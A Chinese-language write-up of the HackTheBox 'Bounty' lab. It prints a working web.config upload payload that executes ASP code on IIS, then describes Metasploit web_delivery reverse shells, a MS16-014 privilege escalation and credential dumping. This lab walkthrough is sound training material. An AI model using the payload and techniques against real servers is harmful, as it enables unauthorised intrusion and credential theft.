[HackTheBox]Bounty - WriteUp

0x01 Discovery

就开了个80 扫目录,发现这样一个东西 image aspx的站,去看看

0x02 Web Exploit

image 有个上传点 怼点东西上去

txt,aspx,asmx失败 image 只能传图片 image

拿burp测测文件后缀 直接改后缀没用 00截断直接报错。。。 image

intruder看一下 image 长度1350的应该就是可以上传的 可以传config!!! 网上查查,找个payload,传上去 传哪里了呢? 看看扫目录的结果 image 传上去看看

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

网页返回了3 说明有RCE

但是并没有回显。。。 这样处理 cmd /c ping <my ip> 然后在本机tcpdump -i tun0 icmp image 得到回显 说明恶意代码被执行了

0x03 Privilege Escalation

介绍几个后渗透框架

nishang

一个powershell后渗透工具

merlin

跨平台C&C工具

unicorn

powershell免杀工具


先占坑。。。 先拿msf瞎搞一波 use exploit/multi/script/web_delivery 主机和端口号改好,target选powershell。 生成payload image 把powershell命令丢进刚才的shell里面 反弹! 得到user.txt

0x04 Privilege Escalation II

use post/multi/recon/local_exploit_suggester 找提权工具 找到windows/local/ms16_014_wmi_recv_notif 提权 image sessions -u 升级成meterpreter即可

得到root.txt

顺便抓一波用户名和密码。 image